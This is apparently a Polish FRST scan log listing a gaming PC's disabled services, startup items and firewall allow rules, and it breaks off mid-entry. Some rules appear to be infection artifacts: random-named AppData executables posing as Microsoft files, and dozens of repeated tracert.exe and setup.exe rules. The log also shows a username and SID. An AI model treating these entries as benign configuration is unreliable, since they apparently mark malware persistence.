==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == Załączenie wejścia w fixlist spowoduje jego usunięcie. MSCONFIG\Services: AdobeARMservice => 2 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: asComSvc => 2 MSCONFIG\Services: AsusFanControlService => 2 MSCONFIG\Services: BEService => 3 MSCONFIG\Services: Disc Soft Lite Bus Service => 3 MSCONFIG\Services: EasyAntiCheat => 3 MSCONFIG\Services: Futuremark SystemInfo Service => 3 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: NvContainerLocalSystem => 2 MSCONFIG\Services: NvContainerNetworkService => 3 MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2 MSCONFIG\Services: NvTelemetryContainer => 2 MSCONFIG\Services: Origin Client Service => 3 MSCONFIG\Services: Origin Web Helper Service => 2 MSCONFIG\Services: Steam Client Service => 3 MSCONFIG\Services: WsAppService => 2 MSCONFIG\startupreg: Lightshot.exe => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe HKLM\...\StartupApproved\Run: => "jv16 PT (Startup Optimizer)" HKLM\...\StartupApproved\Run32: => "Lightshot" HKLM\...\StartupApproved\Run32: => "SDTray" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "CCleaner Monitoring" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "World of Tanks" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "EpicGamesLauncher" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "Discord" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "utweb" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning" HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\StartupApproved\Run: => "com.blitz.app" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [UDP Query User{BE9F772D-503E-40A0-8A4D-B58DA757D942}E:\league of legends\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe () FirewallRules: [TCP Query User{C1291758-0C01-40A0-9C95-1BA0E430CCD1}E:\league of legends\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe () FirewallRules: [{C49A17C8-7A52-4483-A3D1-F2518D16FE53}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku FirewallRules: [{AEA7D350-3B5A-4355-81BD-0223CDD934E5}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku FirewallRules: [{F0B73AC0-FFA1-45CD-9CC4-1737363305AD}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) FirewallRules: [{1BA8A565-A9CA-412E-A563-C34495F3D271}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) FirewallRules: [UDP Query User{0D86770E-1CBD-421C-B517-1FA48AF41847}E:\league of legends\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe Brak pliku FirewallRules: [TCP Query User{E1AAE109-1EA3-4589-8BE3-533C380F6765}E:\league of legends\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe Brak pliku FirewallRules: [UDP Query User{F0F96E1E-9874-43BF-B338-D46B0E38B7A9}E:\league of legends\rads\projects\league_client\releases\0.0.0.176\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.176\deploy\leagueclient.exe Brak pliku FirewallRules: [TCP Query User{B00223D3-D55B-495C-86A3-2AA6811790E9}E:\league of legends\rads\projects\league_client\releases\0.0.0.176\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.176\deploy\leagueclient.exe Brak pliku FirewallRules: [{35B58B9E-F2BE-4A86-BE67-1B5D7FF8AF7C}] => (Allow) E:\Gry Steam\steamapps\common\PC Building Simulator\PCBS.exe () FirewallRules: [{94DD0471-81B2-4271-B135-27614D032572}] => (Allow) E:\Gry Steam\steamapps\common\PC Building Simulator\PCBS.exe () FirewallRules: [{9791A5E3-6E3D-44E9-8FD7-20FF5744E3C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\mb_warband.exe ( Taleworlds Entertainment) FirewallRules: [{A451AB3B-F9E0-4E0B-BFE1-EB1B024AEA0E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\mb_warband.exe ( Taleworlds Entertainment) FirewallRules: [{039387B0-F432-40F9-9FD4-288A6F4CBEAF}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku FirewallRules: [{D450AD48-5C87-4FD8-BA80-D26B3D3BDE13}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku FirewallRules: [{16AE6727-4D66-4877-95F5-499ED13BDF72}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ring of Elysium\SLauncher.exe () FirewallRules: [{2392F26C-E35D-435F-9D15-8F0F3431B013}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ring of Elysium\SLauncher.exe () FirewallRules: [{C44357BF-3224-4923-BF0D-65B8AD7A5466}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd) FirewallRules: [{2413F9B5-D7FE-49A7-B248-04A9C2C5EDD1}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd) FirewallRules: [UDP Query User{6B97C98B-8853-41B2-BC6A-6454FBFBF5B6}E:\hearthstone\hearthstone.exe] => (Allow) E:\hearthstone\hearthstone.exe () FirewallRules: [TCP Query User{4FF877CC-84BF-40C3-BAC1-53AF0DED205B}E:\hearthstone\hearthstone.exe] => (Allow) E:\hearthstone\hearthstone.exe () FirewallRules: [UDP Query User{865B7BA5-F3D1-4B38-87EA-5DBC9DF4737A}E:\league of legends\rads\projects\league_client\releases\0.0.0.175\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.175\deploy\leagueclient.exe Brak pliku FirewallRules: [TCP Query User{77503189-E934-4059-8903-3FE5339C6AF9}E:\league of legends\rads\projects\league_client\releases\0.0.0.175\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.175\deploy\leagueclient.exe Brak pliku FirewallRules: [UDP Query User{F316D661-DFE7-4ADA-ADB0-1AC5E843E2F4}E:\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe Brak pliku FirewallRules: [TCP Query User{55C83160-9FB0-45BF-BC95-1DFA765D6A5A}E:\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe Brak pliku FirewallRules: [{F923F81F-1AA5-4BFE-9181-2E2C287AA479}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) FirewallRules: [{C1CA42F1-749C-48F7-BB70-F1FF30F5E8FD}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) FirewallRules: [{80A400F2-245B-4E42-9D39-492428287652}] => (Allow) E:\Gry Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe () FirewallRules: [{9E5E43D0-AF9A-4689-919A-44A845412F01}] => (Allow) E:\Gry Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe () FirewallRules: [{0F8AD81F-EC1D-4010-A63C-EB1CE930961E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corporation) FirewallRules: [{C449B64B-D67D-4858-8421-0808203C9DC2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corporation) FirewallRules: [{053CD754-6515-4250-9AD7-0CEB8714BBBC}] => (Allow) E:\Gry Steam\steamapps\common\TPH\TPH.exe () FirewallRules: [{CB52F7B5-06B6-42AF-AD91-AECE2EDB4C7D}] => (Allow) E:\Gry Steam\steamapps\common\TPH\TPH.exe () FirewallRules: [UDP Query User{56CD7882-90CC-4CD3-9D05-CFDD2A06C75A}E:\destiny 2\destiny2.exe] => (Allow) E:\destiny 2\destiny2.exe Brak pliku FirewallRules: [TCP Query User{8A4B9DFF-BD94-4C2C-B24B-8C15D54B1358}E:\destiny 2\destiny2.exe] => (Allow) E:\destiny 2\destiny2.exe Brak pliku FirewallRules: [UDP Query User{0B4126EE-6086-421F-B9EA-5431B26F5294}C:\program files (x86)\origin games\fifa 19\fifa19.exe] => (Allow) C:\program files (x86)\origin games\fifa 19\fifa19.exe (Electronic Arts) FirewallRules: [TCP Query User{0EC4131A-12F3-491C-AF07-D81E5D9E3C5D}C:\program files (x86)\origin games\fifa 19\fifa19.exe] => (Allow) C:\program files (x86)\origin games\fifa 19\fifa19.exe (Electronic Arts) FirewallRules: [{045B88C5-617D-4D76-96E3-F9EB722D83AE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation) FirewallRules: [{E8054376-579B-4284-BDA9-5EFE54B6876D}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation) FirewallRules: [{9555FBBD-3CD5-430C-A84C-61D8A1BC4F68}] => (Allow) C:\Program Files (x86)\Origin Games\FIFA 19\FIFASetup\fifaconfig.exe (Electronic Arts) FirewallRules: [{3FA58CB9-5F23-4F52-B8CD-8C6E0A8A8674}] => (Allow) C:\Program Files (x86)\Origin Games\FIFA 19\FIFASetup\fifaconfig.exe (Electronic Arts) FirewallRules: [{093D2271-CF90-441A-8156-B28B2995E34D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\LEGO - The Hobbit\LEGOHobbit.exe (Warner Bros. Interactive Entertainment) FirewallRules: [{66674539-F2D4-45D7-8834-D44458C28B20}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\LEGO - The Hobbit\LEGOHobbit.exe (Warner Bros. Interactive Entertainment) FirewallRules: [{1C852AAE-6060-4724-9BFC-032E8FF016BC}] => (Allow) D:\SiSoftware Sandra Lite Titanium.SP2c\WNt600x64\RpcSandraSrv.exe Brak pliku FirewallRules: [{F2E379E9-BFFB-49F6-897B-EFC2CF952AB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\This War of Mine\This War of Mine.exe () FirewallRules: [{21255DF2-A1D0-451B-95F5-5835DEF112A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\This War of Mine\This War of Mine.exe () FirewallRules: [{34CBBFE8-B7B4-45C2-A4FE-5021C785A85D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\This War of Mine\Storyteller.exe () FirewallRules: [{30F6AE99-051F-4322-A9FE-CFF9F17CBCF2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\This War of Mine\Storyteller.exe () FirewallRules: [{75CE7C8F-6BB8-4006-8B8F-5B8C6945E34F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku FirewallRules: [{574CB234-5DCE-4490-8CE6-9EE91990E1B2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe Brak pliku FirewallRules: [{89E78528-CFEF-4C16-8439-C4C7AE406EE1}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Corporation) FirewallRules: [{2AE89C34-DFB0-4383-A3D0-FA1200F50B90}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\EuJMNAIjKB.exe (Microsoft Corporation) FirewallRules: [{621AD324-338C-4230-96EB-F06F163E5E44}] => (Allow) C:\Users\PiotriPawel\AppData\Roaming\dfIMY.exe (Microsoft Corporation) FirewallRules: [{28C7E986-1664-4095-A9E8-29D2B5EE3C7C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{D0A312C8-B2DC-4797-8DC2-229407A0E52F}] => (Allow) E:\Gry Steam\steamapps\common\Hand Simulator\Hand Simulator.exe () FirewallRules: [{E7183A25-5B9A-434E-B7A8-CB4D2143E50E}] => (Allow) E:\Gry Steam\steamapps\common\Hand Simulator\Hand Simulator.exe () FirewallRules: [{14CC1F92-7FF3-4A95-8E9A-91E7F89854DA}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{580D3253-DD94-4BEE-8013-85010777EB6A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C674A19A-0368-4E9E-A724-2F9CA8669AE8}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9AC2EACE-C681-4DA9-9AA7-E606F8504EA6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{478EF7F6-ECB4-40DF-A924-AFC9B0F333A5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{3C2A97E8-1833-4A09-A37C-C94DEF62C454}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{F95C4A4F-FB53-4B40-AA79-5DCB8A6BCC83}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{68460C64-4893-4A56-A454-AAE08AB98F8C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{FE1E318C-09DF-4D9F-9C88-14C201EF90EC}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{4038070B-1149-418C-A7A0-A00B72B57B5E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{4F8972FB-51C9-4BB7-9388-B79FB4290166}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{314C2202-F092-4D59-AA29-D7EE3DC7C21A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{E7235ABD-6BE0-4570-ABA3-44274B50AE7E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7A141189-0F39-462C-887C-34EEAF7EDEEB}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{FC65A9B2-E3AC-4AC7-BD71-043D74123179}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{F41BFFC7-1E30-4F8F-B853-498012B2D78C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CEF9D5C6-FBC2-44CA-9822-95959763393B}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{DB3221D9-C0BA-4FCB-96DF-A0844282C5B1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{3B9C2F88-C12A-442E-8F05-7131792988B2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{5E268DA2-05A1-4B0C-91A8-2FCB44A2A5F4}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{02C78E1E-19DC-4D8F-AC43-B33C01403207}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{5E95164C-A1D4-4B1D-A089-AFC522677527}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1C55584E-6743-46A4-9231-3A258A419D33}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{0B871134-8B0E-49A9-A4D7-81C692024DDD}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{723E2A70-C9DF-47EA-B34D-F006049E9930}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{763D3ECB-937B-4862-802D-407A7BFBA617}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{D5C3EFBB-A792-48E6-9D63-C728CBF61FCC}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{4481E404-A1A7-4CBB-B943-E8AAB1052661}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7D13013C-DC69-4707-A15A-D174188D5F56}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CD61EC9E-8D79-47C9-B282-48B99886C87D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [TCP Query User{53DC7C5A-F71D-455F-BABE-1FA505C895BB}E:\league of legends\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe () FirewallRules: [UDP Query User{F813CA09-7391-40F2-A378-F5560F2F28C0}E:\league of legends\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe] => (Allow) E:\league of legends\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe () FirewallRules: [{90EE462A-D289-4E32-A5AF-0C4561291542}] => (Allow) D:\DriverEasy\DriverEasy.exe (Easeware) FirewallRules: [{A160397A-628E-4CD1-81AC-16846FACB6A2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{15F87A5F-A1F9-4936-9F61-23E46413FB41}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{998E7063-6D3F-43A7-8854-C885BDC29ADE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{64A2D984-4840-41FE-A69B-87A15F0D3E5F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C0E24F2D-B3B6-4D44-AFB5-47A32C435FA2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7F5A7F90-80B4-4AD5-94F9-6AD7EF6BBC8D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{049882C7-C382-400D-AEAA-F71B5EC7F983}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1B9B5F0B-2360-421E-8215-7CB275709CCF}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{FEA10243-7023-41CE-A0F6-8BADA1F95372}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{7604B851-B8AE-436E-82C1-A579CC629BA0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{DF358776-9A5B-4004-8DE9-CEEA6E790BF9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{25AF8F04-362B-46DD-9DDC-E56E33F138FB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{402855D2-E310-48EC-87E2-7FD561E96745}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1423FA9A-F059-418D-9EC0-3CCB097C6CE6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7085492C-4BB7-4B81-8074-232A8E2E0399}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{3D999900-8F5F-4893-B6B8-289FD68DE0A7}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{87E6ED9C-7A9A-4186-A2F7-800615F6359C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{3979ACEE-2A02-4DF7-9327-EAB5DDB1481B}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{49EBFB73-F5A0-4BF6-A44B-164AB124C295}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{63F293D2-19FF-40DA-83CD-61D27F488C35}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{3FFB4C77-991A-4898-B684-83CF83EDF2F4}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{0F03AD7A-AC49-4A79-8905-047B1BEA7342}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CF110651-67AE-4D9B-8B85-AF80B6EAD2F6}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{86DB424B-5F21-422B-9E20-309FB0A138D3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9BEFB80F-183D-49B6-B4DC-4AA6BCAE00B4}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{0AE71CCB-576C-4DEB-974F-D94BDCE12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{385B4813-5994-4DA0-98C7-5A5545EED619}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{D212A030-E4D7-424D-ADC0-F6900DB3F0CB}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{85BD9226-0403-47DF-82EA-DCC5AC1C07AC}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{EEC05465-2D4F-4ECA-ABD7-9882F2619FAA}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{41AB0D6B-D352-49C8-9905-3846E6B68C73}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{03D6D66E-4E80-4793-BC57-7A7F3E8B057C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{82ACFCE4-A10C-4CD7-A2E4-A8891AEBF79F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{188CE4CC-27A3-46E4-97A4-B6A7C7821D64}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C289590C-EF3F-425B-961D-0A8F4DD4CF6B}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{8E9EA2A2-B2F9-49FB-97AD-92288A381598}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{6C179524-2B12-4AB2-8287-4A9E14EA3EB7}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{5BE3D764-87AC-4B42-9EA6-42DDA9159C3F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{B025F1E6-FDC3-449A-8391-416D609C275F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{264D0C92-DAB6-437F-9437-C71E44289774}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{C73A08B3-2032-4ABF-8E2F-5482E7E25520}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{98F7DAEB-1325-473D-885D-FD8E21739137}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{31585901-D6FC-48C0-881E-6DB84016D812}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{690599C5-89A7-4865-9BA0-378B2289120F}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{A12EE20A-0134-48B2-8EDA-C6C0F6DDA46A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{ED63AC68-11D0-409A-84D7-B2CE8BD8DE43}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{1F589736-30F1-48A4-B23E-115424D72A05}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{21CA5531-16E6-46E3-BC53-C91B645B3175}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9E4C2E4A-607D-4E83-B300-93AEEF856AED}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{61301919-9073-4E64-8E27-391E7359008E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{676EE2B6-5675-4E6F-AE46-594256B56DC5}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{E78F0871-D3CC-402D-8C96-67D6A493C387}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{E8E1E460-DC0E-41F5-A4A5-8A7E048D706E}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{8A12E03E-C29C-4471-A9AB-9DF4BE54B463}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7264C442-3F7C-4EC5-AC18-948C0C48E172}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{B40941F4-555D-42F6-BA96-9638F6C7B049}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{4743698F-EE18-4BD3-99B0-84EBA9B814A4}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{B796D154-77E5-49BD-A1E7-F01FDF9CFCDA}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{D81DA265-01DC-4F9E-85C1-69E92D5C65E7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{AC8299AD-2B61-4F83-B1C6-035E5C9A4C67}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{A3058A23-5D2A-4347-8853-59C64A87CBD0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{52DAD159-C46F-4E27-B7B6-8592B247CCF5}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{250BDB1A-8D4B-4C41-8164-16B5DED39524}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{7F0E529E-8932-4DAD-8754-05F5ABBDF29C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{4EF4392E-1DE3-4E2A-8091-D2A7B5EB529D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{2B3BDD22-3C15-473F-9A34-D6F4630B816A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{E4037783-5C89-417B-8068-9CF323EC692C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{5110476F-C7F8-4D69-A98C-87189CBCEC3A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{EA4EC93D-D2CB-49E0-A02B-A99751E06003}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{605FD0F1-3546-4E75-9D7B-D51A0D5061FA}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{CB2CAD01-C542-485F-A7FB-ADE6F54EF1C3}] => (Allow) 